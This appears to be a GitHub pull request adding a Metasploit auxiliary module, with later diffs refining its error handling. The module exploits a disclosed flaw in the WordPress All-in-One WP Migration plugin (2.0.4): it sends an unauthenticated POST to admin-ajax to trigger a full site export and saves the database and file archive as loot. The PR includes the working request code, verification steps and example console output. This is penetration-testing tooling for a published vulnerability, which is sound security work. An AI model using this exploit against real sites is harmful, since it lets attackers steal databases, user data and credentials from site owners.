### PR TITLE
Add WP All In One Migration Export Module

### DIFF
--- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
+++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
@@ -25,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
         ],
       'References'      =>
         [
-          ['WPVDB', '7857']
+          ['WPVDB', '7857'],
+          ['URL', 'http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability']
         ],
       'DisclosureDate'  => 'Mar 19 2015'
     ))

--- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
+++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
@@ -1,0 +1,68 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress All-in-One Migration Export',
+      'Description'     => %q(Due to lack of authenticated session verification
+                              it is possible for unauthenticated users to export
+                              a complete copy of the database, all plugins, themes
+                              and uploaded files.),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'James Golovich',                  # Disclosure
+          'Rob Carr <rob[at]rastating.com>'  # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['WPVDB', '7857']
+        ],
+      'DisclosureDate'  => 'Mar 19 2015'
+    ))
+
+    register_options(
+      [
+        OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])
+      ], self.class)
+  end
+
+  def exporter_url
+    normalize_uri(plugin_url, 'modules', 'export', 'templates', 'export.php')
+  end
+
+  def check
+    check_plugin_version_from_readme('all-in-one-wp-migration', '2.0.5')
+  end
+
+  def run
+    print_status("#{peer} - Requesting website export...")
+    res = send_request_cgi(
+      {
+        'method'    => 'POST',
+        'uri'       => wordpress_url_admin_ajax,
+        'vars_get'  => { 'action' => 'router' },
+        'vars_post' => { 'options[action]' => 'export' }
+      }, datastore['MAXTIME'])
+
+    if res.nil?
+      print_error("#{peer} - No response from the target")
+      return
+    elsif res.code != 200
+      print_error("#{peer} - Server responded with status code #{res.code}")
+      return
+    end
+
+    store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup')
+    print_good("#{peer} - Backup archive saved to #{store_path}")
+  end
+end

--- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
+++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
@@ -55,12 +55,12 @@ class Metasploit3 < Msf::Auxiliary
         'vars_post' => { 'options[action]' => 'export' }
       }, datastore['MAXTIME'])
 
-    if res.nil?
-      print_error("#{peer} - No response from the target")
-      return
-    elsif res.code != 200
-      print_error("#{peer} - Server responded with status code #{res.code}")
-      return
+    unless res
+      fail_with(Failure::Unknown, "#{peer} - No response from the target")
+    end
+    
+    if res.code != 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Server responded with status code #{res.code}")
     end
 
     store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup')

--- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
+++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
     unless res
       fail_with(Failure::Unknown, "#{peer} - No response from the target")
     end
-    
+
     if res.code != 200
       fail_with(Failure::UnexpectedReply, "#{peer} - Server responded with status code #{res.code}")
     end


### PR DESCRIPTION
Due to lack of authenticated session verification it is possible for unauthenticated users to export a complete copy of the database, all plugins, themes and uploaded files.
## References

https://wpvulndb.com/vulnerabilities/7857
http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerabili
## Important Notes

Due to the fact it can take quite a long time to both produce the website backup and to transmit it, I have added a `MAXTIME` option so the user can specify how long to wait before the timeout kicks in.

In addition, this module may fail until #5749 is merged in, as that PR addresses being able to override the timeout.
## Verification
- [ ] Download and install [WordPress](https://wordpress.org/download/)
- [ ] Install a vulnerable version of the plugin from https://downloads.wordpress.org/plugin/all-in-one-wp-migration.2.0.4.zip
- [ ] Load msfconsole and `use auxiliary/gather/wp_all_in_one_migration_export`
- [ ] Set `RHOST` to the target's address
- [ ] If running WordPress in a subdirectory, ensure to set `TARGETURI` appropriately (e.g. if running in a folder called wordpress, set `TARGETURI` to `/wordpress/`)
- [ ] Run `check` to verify the target is vulnerable
- [ ] Run the module
## Example Output

```
msf > use auxiliary/gather/wp_all_in_one_migration_export
msf auxiliary(wp_all_in_one_migration_export) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf auxiliary(wp_all_in_one_migration_export) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf auxiliary(wp_all_in_one_migration_export) > check
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf auxiliary(wp_all_in_one_migration_export) > run

[*] 192.168.1.15:80 - Requesting website export...
[+] 192.168.1.15:80 - Backup archive saved to /root/.msf4/loot/20150720182925_default_192.168.1.15_wordpress.export_992837.zip
[*] Auxiliary module execution completed
msf auxiliary(wp_all_in_one_migration_export) >
```
